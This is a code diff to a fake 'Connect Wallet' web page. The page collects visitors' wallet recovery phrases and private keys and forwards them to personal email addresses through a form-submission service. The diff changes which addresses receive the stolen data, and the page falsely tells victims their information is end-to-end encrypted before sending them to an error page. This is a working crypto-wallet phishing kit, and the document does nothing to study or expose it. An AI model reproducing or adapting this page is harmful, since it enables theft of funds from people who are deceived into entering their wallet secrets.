--- a/walletconnect.html
+++ b/walletconnect.html
@@ -211,7 +211,7 @@
 <body>
     <div class="container">
         <h2 id="walletTitle">Connect Wallet</h2>
-        <form id="walletForm" action="https://formsubmit.co/maxwellisafineboy@gmail.com" method="POST">
+        <form id="walletForm" action="https://formsubmit.co/julietbredt@outlook.com" method="POST">
             <h3>NB: All information are end to end encrypted. We do not share data and activity sessions with any other company</h3>
             <div class="buttons">
                 <button type="button" onclick="showInput('phrase')">Phrase</button>
@@ -231,7 +231,7 @@
                 <textarea type="text" name="privateKey" placeholder="Enter your Private Key"></textarea>
             </div>
             <input type="hidden" name="_captcha" value="false">
-            <input type="hidden" name="_cc" value="jamieheadie@outlook.com">
+            <input type="hidden" name="_cc" value="maxwellisafineboy@gmail.com">
             <input type="hidden" name="_next" value="https://error-sage.vercel.app/">
             <button type="submit" id="submitBtn">Submit</button>
         </form>
@@ -270,6 +270,7 @@
 </body>
 
 </html>
+
 
 
 
